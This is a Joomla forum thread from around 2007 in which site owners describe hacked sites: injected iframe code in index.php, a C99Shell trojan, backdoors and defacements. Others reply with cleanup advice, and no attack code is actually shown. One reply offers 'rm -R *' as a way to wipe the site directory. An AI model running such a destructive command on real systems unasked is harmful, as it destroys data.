Joomla! Discussion Forums

I have had two Joomla website hacked this week .  So this posting is a warring to other to take care.

I am running Joomal 1.0.12 on both site and have followed the security advice on the forum as best as I can.  All file have had there permissions set to 644 and folders to 755.

What’s happened is the hacker has added the following code to the end of index.php which is not good.  When I tried to access the home page my anti virus software popup and started moving file from the browser to the virus vault.     




The index.php file had its permissions set to 644 I have now set it to 444 and just hope that this will stop them.

Is your site on a shared host?

wow, that sucks. i'd also like to see more details, like which version of php, how you turned off register globals, what kind of host(s) you are using, etc.

edit: oh yeah -- if you wouldn't mind, please list the 3rd-party stuff you're using

Yes it’s a shared host
Its PHP version 4xx I will check tomorrow and post full info
All security settings such a global are set corretaly. 
When I start Joomla admin I do not get any warnings and the bottom of the page.

I'm sorry to hear that  . Do you have a backup of your files?
I'm a newbie here, so I'll ask whether they also changes/erased other data, or just edited the index.php?

I have now found that the .htaccess file has been deleted also I have set the file permissions to 444 in the root folder.  However as soon as I start the joomla website the file permissions are set back to 644, Is this correct can joomla do this?

PHP version 4.4.2
MySql version 4.1.21- standard
Apache version 1.3.36 - Unix

Be sure to delete the entire directory and start from clean backups, or from scratch. Once they get in, there are many things they may have done to your site. Not much point in trying to figure out how many changes were made.

For more info, see: http://forum.joomla.org/index.php/topic,81058.0.html

I have fully reinstalled the site over the old site, is this sufficient?  Or should I have the web host delete the site and then start again?

I just had my site hacked also .  They hacked into my index file and installed that nice little ----
"
"  ----
My host guy found it and removed the code and everything seams to be fine for now.  i changed all passwords.
He says they got in through Joomla. 
So, what does a person do to keep them out!!

1) Read this: http://forum.joomla.org/index.php/topic,81058.0.html

2) Delete the entire public_html directory and reinstall from clean backups or from original installs. Once they get in, there are many things they may have done to your site, and you may never find all Trojan Horses, meaning you may get attacked again at any time.

Depends on how the reinstall was done. A complete reinstall would take care of Joomla file issues, but if a non-Joomla file was added to a standard Joomla directory, then reinstalling Joomla probably would not effect that file. That's why I recommend totally deleting the directory and creating a new one before reinstalling. That guarantees a complete new install with no lingering Trojan Horses.

Of course you can also mess around with "rm -R *" which does essentially the same thing.

This particular hack is not a joomla hack. It has been reported elsewhere (back in september I think) as a hack in cpanel. Cpanel released a patch to fix this,

I would suggest finding another hosting company who has better controls and knowledge of their setups.

Also you should do a virus scan of your local PC as this hack attempts to download a virus to the computer of every visitor to your site

Thanks for all the info   As far as i know, looking at my files and research on the web the attack is just inserting the "I-frame" and not messing up the site.  Their attack is the sites users, gaining access to the users computers, not the website.  Because, if the site is messed up then no one will visit the site. 
UNLESS???!!!  They have also hidden a code to gain access back to the site and infect it again.  This is just an idea. 




Also, i use camelot hosting and i informed him of a possible hack.  He immediataly fixed the hack and even gave me a phone call to explain and make sure that everything is ok.  Now, that is customer service  

No customer sevice would have been to apply the fix when it was released months ago and not leave you vulnerable

@ brian

I was wondering how you are able to tell from this code insert that it's a cPanel attack? I would have thought it could also be done by a Trojan Horse or through the J! Template Mgr. Are you saying it has to have been a cPanel attack because of the file permissions (644)?

I am saying that its a cpanel attack as back in september (iirc) this exact same hack occured and after discussions on the webhostingtalk and cpanel forums cpanel released a patch

If as a mod you have access to the xxxxx in the first post just google for it and you will get the links othewise pm me

My site got haked today
I installed 1.0.12 about 2 weeks ago
I moved the files the hacker instaleld to a folder and here are the links
[MOD NOTE: LINKS TO SCRIPT KIDDIE GRAFFITI REMOVED]

dang you really got hacked.  my hacker just intalled that little I-frame download/redirect.

my joomla site was hacked last night or today early morning. I won't give that duckass the benefit of the doubt mentioning his/her name, but they shut down my site. How are these hackers able to find, target and disable joomla sites? Is there some spider/bot that searches the web for Joomla tags? I've removed any joomla meta tags, but it seems they have other ways of finding Joomla sites.
Does the following information lend any clues as to what I must do to reestablish my site:

HACKED BY XXXXX; (duckass left a weblink here too)
Warning: main() [function.main]: open_basedir restriction in effect. File(/includes/version.php) is not within the allowed path(s): (/home/xxxx:/usr/lib/php:/usr/local/lib/php:/tmp) in /home/xxxx/public_html/xxxx/includes/joomla.php on line 71

Warning: main(/includes/version.php) [function.main]: failed to open stream: Operation not permitted in /home/xxx/public_html/xxx/includes/joomla.php on line 71

Fatal error: main() [function.require]: Failed opening required '/includes/version.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/xxx/public_html/xxx/includes/joomla.php on line 71

There are other fingerprints a joomla site has other then the meta tags like index.php?option=com_frontpage but it is possible they gained access from another account on your hosts server.

You might want to have your host check things over and review your log files and be sure you are running the latest versions of Joomla and any trusted 3rd party extensions.

Many of these types of attacks are from a comprised account on another site on a shared host.

Been hacked here also

I have been picking through folder after folder for about 3.5 hrs now.
Irc hacks and back doors all over the place.
This started  right after the 1.0.12  upgrade.  And this was on two sites one that was just installed without and  outside modules or components.  I just started to work on this site.  Our provider states there is a hole in Joomla that let them in.

No what  ???  Our site has been trashed and the backup is probably not going to help.

SZippy 


Update 2227est 27jan07  Still at it since 1730est. Most every folder had something hidden in it.  The biggest hit was the cgi-bin and administrator/components/com_linkdirectory folder.

when i was hacked i was running Joomla 1.0.10.  with a bunch of extensions, mods...  Then after the hack i upgraded to the 1.0.12.  My hoster also said it was Joomla, but of course no one is admitting any guilt.  I don't care who is at fault  

Let's just get this problem solved.  I wish i knew more to help solve this problem, but i am an amatur dude.  It would be nice if there was a way to start a forum, data base, or sometype of way to compare sites that each person had installed, set ups, versions,..ect...  that were hacked to narrow down where the gate is.  All though we wouldn't be able to public post these cause then the hackers would love us even more.  Just an idea.

It three times this week now  and I am getting fed up.  Same as last time the hack added lines of code to the index.php and this time to the index2.php file as well.  Also at lot more line were added to the file.

I have set the file permissions to 644 all on Joomal settings are correct so I just don’t know what to do now.  I will however delete the site and start afresh next week and see how that does.

I small utility to monitor the two files would by useful and one which could copy the proper files back would be splendid.  I know its not an answer to security issue but it would stop this hack. 

These are the two files you see. There are possibly dozens of other modified by the cracking scripts. If you have followed the security guidelines on this forum, your site would have been safe. There are millions of other safe site using joomla.

alamgir

Check if this helps: http://forum.joomla.org/index.php/topic,130926

My Recommendations

If you are using cpanel changed your password, don’t level the one you were given and change it frequently.

Check file and folder permissions and don’t forget your root folder public_html this folder can quite easily be overlooked.

i found las night my site hacked, the index.php and index2.php deleted, and created a index.html

i think the hole is com_babackup

i found the index.html, 7us.php and use.php (is a PHP/C99Shell.A trojan) in /administrator/com_babackup/classes changed..

grffggfgrttllñlkrt !!

my 4 joomla sites was hacked same method. I use joomla 1.0.12 version. My other joomla versions are not hacked.
the hacker has added the following code to joomla main directory index.php first line.



I clean the codes.

and I use plesk 8.01. I run rkhunter on the plesk panel for scan the server but no find any virus or trojan... I checked permissons. but the code added again...

please help